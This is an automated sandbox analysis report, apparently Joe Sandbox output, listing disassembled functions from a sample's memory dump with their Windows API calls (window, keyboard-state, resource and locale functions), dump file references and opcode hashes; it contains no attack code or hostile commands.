Function 004F4F49 Relevance: 21.3, APIs: 14, Instructions: 280keyboardwindowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 004F502D
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 004F5049
GetCapture.USER32 ref: 004F50C3
GetKeyState.USER32(00000011), ref: 004F5125
GetKeyState.USER32(00000010), ref: 004F5132
ImmGetContext.IMM32(?), ref: 004F5140
ImmGetOpenStatus.IMM32(00000000,?), ref: 004F514D
ImmReleaseContext.IMM32(?,00000000,?), ref: 004F516F
GetFocus.USER32 ref: 004F5199
IsWindow.USER32(?), ref: 004F51DA
IsWindow.USER32(?), ref: 004F5260
ClientToScreen.USER32(?,?), ref: 004F5270
IsWindow.USER32(?), ref: 004F5296
ClientToScreen.USER32(?,?), ref: 004F52C5

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
String ID:
API String ID: 1155058817-0
Opcode ID: 1fdd139f4a0bb9c27b635ee1f19f0256fa8ce54e443f687fe95b984c2ccafed6
Instruction ID: 20ecc6699b27c1d516d9a545119f8091cfbc0dc38f416b9341769c89f34a88be
Opcode Fuzzy Hash: 1fdd139f4a0bb9c27b635ee1f19f0256fa8ce54e443f687fe95b984c2ccafed6
Instruction Fuzzy Hash: DFA1DF31900A0AAFDF249FA0D984ABF77B5FF44304F10452BE75AD22A1DB39E940DB59

Function 004F3094 Relevance: 21.3, APIs: 14, Instructions: 268keyboardwindowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 004F316D
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 004F3189
GetCapture.USER32 ref: 004F3209
GetKeyState.USER32(00000011), ref: 004F325C
GetKeyState.USER32(00000010), ref: 004F3269
ImmGetContext.IMM32(?), ref: 004F3277
ImmGetOpenStatus.IMM32(00000000,?), ref: 004F3284
ImmReleaseContext.IMM32(00000000,00000000,?), ref: 004F32A6
GetFocus.USER32 ref: 004F32D0
IsWindow.USER32(?), ref: 004F3311
IsWindow.USER32(?), ref: 004F3397
ClientToScreen.USER32(?,?), ref: 004F33A7
IsWindow.USER32(?), ref: 004F33CD
ClientToScreen.USER32(?,?), ref: 004F33FC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
String ID:
API String ID: 1155058817-0
Opcode ID: dde848cda4f5c491fe21bd7d9e90544ba9c13481378aa5c2ec0b38f4e38d0f32
Instruction ID: 40ed165370cc998cdf36bfa2fcfa4a6001a9d4159f698ed43d69b5782c54b90a
Opcode Fuzzy Hash: dde848cda4f5c491fe21bd7d9e90544ba9c13481378aa5c2ec0b38f4e38d0f32
Instruction Fuzzy Hash: 6091C67550020AEFDF249FA1C984A7BBBA5FF04306F10852BE696D1261DB39DF90DB09

Function 004FB730 Relevance: 21.3, APIs: 14, Instructions: 262windowCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 004FB7AD
RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 004FB7CB
ReleaseCapture.USER32 ref: 004FB7D1
SetCapture.USER32(?), ref: 004FB7E4
ReleaseCapture.USER32 ref: 004FB859
SetCapture.USER32(?), ref: 004FB86C
SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 004FB945
UpdateWindow.USER32(?), ref: 004FB9A8
SendMessageW.USER32(?,00000111,000000FF,00000000), ref: 004FB9F0
IsWindow.USER32(?), ref: 004FB9FB
IsIconic.USER32(?), ref: 004FBA08
IsZoomed.USER32(?), ref: 004FBA15
IsWindow.USER32(?), ref: 004FBA29
UpdateWindow.USER32(?), ref: 004FBA75

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
String ID:
API String ID: 2500574155-0
Opcode ID: 9abe4d7327ecbeb4991ccfb55ba8a99208d91bbf6f47ab8482872958879b931c
Instruction ID: d315d98f0dba16f10841fa086005e21e92adb4ad0ce94e99e646ef3301c3b509
Opcode Fuzzy Hash: 9abe4d7327ecbeb4991ccfb55ba8a99208d91bbf6f47ab8482872958879b931c
Instruction Fuzzy Hash: 96A15B70600208AFCF11AF65CC88ABE3BA6FF45354F14417AFE199B2A6CB39D904DB54

Function 005370B1 Relevance: 16.9, APIs: 11, Instructions: 446COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00537133
SetRectEmpty.USER32(?), ref: 0053714C
InflateRect.USER32(?,000000FE,00000000), ref: 005371A0
OffsetRect.USER32(?,00000000,00000000), ref: 00537392
GetSystemMetrics.USER32(00000002), ref: 005373DB
InflateRect.USER32(?,00000000,00000000), ref: 00537404
InflateRect.USER32(?,000000FF,000000FF), ref: 005375D1
InvalidateRect.USER32(?,?,00000001), ref: 005375E0
GetClientRect.USER32(?,?), ref: 005375FB
InvalidateRect.USER32(?,?,00000001), ref: 00537627
UpdateWindow.USER32(?), ref: 00537630

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Inflate$ClientInvalidate$EmptyMetricsOffsetSystemUpdateWindow
String ID:
API String ID: 159692204-0
Opcode ID: b04fd5dacb1a5a946ba65b4d278ed273955974d4c3d225340f79b1beb8686b6b
Instruction ID: 7250b212b344c1ad942d35539113639eec72745b095c32693ce18987f6398165
Opcode Fuzzy Hash: b04fd5dacb1a5a946ba65b4d278ed273955974d4c3d225340f79b1beb8686b6b
Instruction Fuzzy Hash: EC0208B1D04519DFCF25DF68C9C8AA97BB5FB49300F1845BAEC099F24ADB30A945CB60

Function 00522724 Relevance: 16.7, APIs: 11, Instructions: 220windowkeyboardCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00522752
GetFocus.USER32 ref: 00522760
IsChild.USER32(?,?), ref: 00522794
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 005227C8
IsChild.USER32(?,?), ref: 005227E4
SendMessageW.USER32(?,00000100,?,00000000), ref: 00522813
IsIconic.USER32(?), ref: 00522854
GetAsyncKeyState.USER32(00000011), ref: 005228DA
GetAsyncKeyState.USER32(00000012), ref: 005228EC
GetAsyncKeyState.USER32(00000010), ref: 005228F9
IsWindowVisible.USER32(?), ref: 0052295A

Part of subcall function 0052F443: RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 0052F470

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AsyncStateWindow$ChildMessageSend$FocusIconicRedrawVisible
String ID:
API String ID: 763474574-0
Opcode ID: 7ebe4a6d9b876acd5df939114c039a285000e53c8a636c9cc6c9c124798bf16a
Instruction ID: c09db54f9929086042f16769d58bab288adf648a3757a6c6399388797dae00a1
Opcode Fuzzy Hash: 7ebe4a6d9b876acd5df939114c039a285000e53c8a636c9cc6c9c124798bf16a
Instruction Fuzzy Hash: CF71D27AA04225BFDB209F60E884B6A7FA6FF46300F094479E985D72E1DB31DC80CB51

Function 005231B3 Relevance: 16.6, APIs: 11, Instructions: 99windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000021), ref: 005231D5
GetSystemMetrics.USER32(00000020), ref: 005231DC
IsIconic.USER32(?), ref: 005231F0
GetWindowRect.USER32(?,00000020), ref: 00523231
IsIconic.USER32(?), ref: 00523255
GetSystemMetrics.USER32(00000004), ref: 00523261
OffsetRect.USER32(00000020,?,?), ref: 00523273
GetSystemMetrics.USER32(00000004), ref: 0052327B
IsIconic.USER32(?), ref: 005232A9
GetSystemMetrics.USER32(00000021), ref: 005232B5
GetSystemMetrics.USER32(00000020), ref: 005232BC

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$Iconic$RectWindow$LongOffset
String ID:
API String ID: 993849457-0
Opcode ID: 04433efb68d80878146e7919c1788309e4848572c6a8384413e740de132faa55
Instruction ID: 07d52d08408e36808cd2e1470bb258ffe13139341c7af1c1b9d6cdc9435fc7d9
Opcode Fuzzy Hash: 04433efb68d80878146e7919c1788309e4848572c6a8384413e740de132faa55
Instruction Fuzzy Hash: 9641F571A002199FCB04DFA9D885BBEBBF5FF58300F04446AEA09EB251DB34A940CF64

Function 0051A90D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 0051A99D
_memset.LIBCMT ref: 0051A9AB
_free.LIBCMT ref: 0051A9D7
IsWindow.USER32(?), ref: 0051AAF8

Strings

0, xrefs: 0051A9C1

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientScreenWindow_free_memset
String ID: 0
API String ID: 2869304798-4108050209
Opcode ID: c3cc301c7b9057fe52aa51396a4209dd06a01590bc80d547842eaa3951ced776
Instruction ID: 4fe0f29815a890aff71851d2c906ad0cf209e063aafb309ce226807baeb69b59
Opcode Fuzzy Hash: c3cc301c7b9057fe52aa51396a4209dd06a01590bc80d547842eaa3951ced776
Instruction Fuzzy Hash: F4519330A022059FEB229FA5D988BEDBFB5FF44310F10412AE851E6291DB759CC1CB42

Function 005234B3 Relevance: 15.1, APIs: 10, Instructions: 146windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 005234D9
ScreenToClient.USER32(?,?), ref: 00523557
GetSystemMetrics.USER32(00000021), ref: 00523565
GetSystemMetrics.USER32(00000020), ref: 0052356E
IsIconic.USER32(?), ref: 0052357C
GetSystemMetrics.USER32(00000004), ref: 00523588
PtInRect.USER32(00000000,?,?), ref: 005235CF
PtInRect.USER32(?,?,?), ref: 005235F8
GetSystemMetrics.USER32(00000004), ref: 0052360E
PtInRect.USER32(00000020,?,?), ref: 00523626

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$Rect$ClientIconicScreenVisibleWindow
String ID:
API String ID: 1122842830-0
Opcode ID: f179ce4009b873dc0c1e571a63a4586aaf6c7f6a8f7961e59bebfd8db01d9434
Instruction ID: 3f57e213065ddcb5b1132fa7cbfad1277ab22ef76d6ac56bebb13709fe55048b
Opcode Fuzzy Hash: f179ce4009b873dc0c1e571a63a4586aaf6c7f6a8f7961e59bebfd8db01d9434
Instruction Fuzzy Hash: CA517F31A0021AAFCF14DF64E880AADBBB5FF49710F144069E909E7290DB39EE15DB90

Function 004ED5ED Relevance: 12.1, APIs: 8, Instructions: 132filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004ED5F7
GetFullPathNameW.KERNEL32(00000000,00000104,?,?,00000268,004ED7D2,?,?,00000000), ref: 004ED635

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

PathIsUNCW.SHLWAPI(?,00000000), ref: 004ED6B1
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004ED6D8
CharUpperW.USER32(?), ref: 004ED70B
FindFirstFileW.KERNEL32(?,?), ref: 004ED727
FindClose.KERNEL32(00000000), ref: 004ED733
lstrlenW.KERNEL32(?), ref: 004ED751

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 624941980-0
Opcode ID: 0dfc4b019a25c6e73ac11efa810c765ce81426c3e8e2063bada4a8280820ce8c
Instruction ID: 88810eb64201e299a0737a9cfefd7adad168818e3d07cc78ee1fe49f371403e2
Opcode Fuzzy Hash: 0dfc4b019a25c6e73ac11efa810c765ce81426c3e8e2063bada4a8280820ce8c
Instruction Fuzzy Hash: FE41D370D042159BDF24AB72CC9DBBE7679AF10319F14069EB81A92291DF398E84CF14

Function 005C86A5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004E1231: __EH_prolog3_catch.LIBCMT ref: 004E1238

GetUserDefaultUILanguage.KERNEL32(00000000,00000005,005C8686,00000000,?,?,005A78C4,00000000,?,005A7C5F,00000000,0000001C,005A79F2,00000000,005A7C5F), ref: 005C86ED
FindResourceExW.KERNEL32(00000000,00000005,?,0000FC11,?,?,005A78C4,00000000,?,005A7C5F,00000000,0000001C,005A79F2,00000000,005A7C5F), ref: 005C872B
FindResourceW.KERNEL32(00000000,?,00000005,?,?,005A78C4,00000000,?,005A7C5F,00000000,0000001C,005A79F2,00000000,005A7C5F), ref: 005C8744
LoadResource.KERNEL32(00000000,00000000,?,?,005A78C4,00000000,?,005A7C5F,00000000,0000001C,005A79F2,00000000,005A7C5F), ref: 005C8752
GlobalAlloc.KERNEL32(00000040,00000000,00000005,005C8686,00000000,?,?,005A78C4,00000000,?,005A7C5F,00000000,0000001C,005A79F2,00000000,005A7C5F), ref: 005C8782

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Strings

MS UI Gothic, xrefs: 005C8707

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Resource$Find$AllocDefaultException@8GlobalH_prolog3H_prolog3_catchLanguageLoadThrowUser
String ID: MS UI Gothic
API String ID: 2010067809-1905310704
Opcode ID: ae569c4a907f9086847241c9501483311645dbb0f299572fefd1a90de00caf42
Instruction ID: 29ae7d79a12bdf2380afe2e85cf135ec63707f463598870a8c2265c76d4d8a21
Opcode Fuzzy Hash: ae569c4a907f9086847241c9501483311645dbb0f299572fefd1a90de00caf42
Instruction Fuzzy Hash: 95310475600202AFDB10AFA6CC5AE7A7BA9FF50714B14802EFD05DB2A1EF35DC41DA64

Function 00542118 Relevance: 9.4, APIs: 6, Instructions: 383COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0054214E
SetRectEmpty.USER32(?), ref: 00542157
InflateRect.USER32(?), ref: 00542239

Part of subcall function 0054107C: __EH_prolog3_GS.LIBCMT ref: 00541086
Part of subcall function 0054107C: InflateRect.USER32(000000FE,000000FD,00000000), ref: 005410F9

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$EmptyInflate$H_prolog3_
String ID:
API String ID: 3226488205-0
Opcode ID: f3177cede798ddf2c173c5ca8eaccd45b67e352a3b1e01f4a13845e39418aa71
Instruction ID: d3e76fcd399a3127257e1c4d61f51398dffe5b7e47a377e7dbc6c804c482f551
Opcode Fuzzy Hash: f3177cede798ddf2c173c5ca8eaccd45b67e352a3b1e01f4a13845e39418aa71
Instruction Fuzzy Hash: B4D17971900628DFCF16CF68C884AEEBBB2FF89318F544269FC09AB145DB319845CB60

Function 00520549 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 294keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004ECC18: GetWindowLongW.USER32(?,000000EC), ref: 004ECC23

GetClientRect.USER32(?,?), ref: 00520674
GetAsyncKeyState.USER32(00000011), ref: 0052071A

Strings

', xrefs: 005205C5

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AsyncClientLongRectStateWindow
String ID: '
API String ID: 304971295-1997036262
Opcode ID: 643f7e32e3047942e1ee9323407c3fa0f8356a2b8f4aa06ce43fe001a74bd2ac
Instruction ID: f858155a13cfdb23fdfb471eb65b9752de608ddb36b8b484ec6966b3989d3453
Opcode Fuzzy Hash: 643f7e32e3047942e1ee9323407c3fa0f8356a2b8f4aa06ce43fe001a74bd2ac
Instruction Fuzzy Hash: 31B17E317026269BDB299F64D498BBE7FE2BF86300F14152DE506DB2D2DB749D80CB81

Function 005E22DF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,005E291C,?,005D6683,?,000000BC,?,00000001,00000000,00000000), ref: 005E231E
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,005E291C,?,005D6683,?,000000BC,?,00000001,00000000,00000000), ref: 005E2347
GetACP.KERNEL32(?,?,005E291C,?,005D6683,?,000000BC,?,00000001,00000000), ref: 005E235B

Strings

ACP, xrefs: 005E22EE
OCP, xrefs: 005E22FF

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 227e5cc90e3c6f2bb706ed05a8449d72f8578af70139fa477ff2e8cdfc19dddf
Instruction ID: 20128853783f77366ef80436fab7080a034430512b4942d3b8048e282b72847b
Opcode Fuzzy Hash: 227e5cc90e3c6f2bb706ed05a8449d72f8578af70139fa477ff2e8cdfc19dddf
Instruction Fuzzy Hash: 87014C3120074BFAEF198B5AEC09F6E3EADBF18319F204815F081E1088EB78DA41DE50

Function 005CC787 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 005D3B2F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005D3B44
UnhandledExceptionFilter.KERNEL32(0061DB00), ref: 005D3B4F
GetCurrentProcess.KERNEL32(C0000409), ref: 005D3B6B
TerminateProcess.KERNEL32(00000000), ref: 005D3B72

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
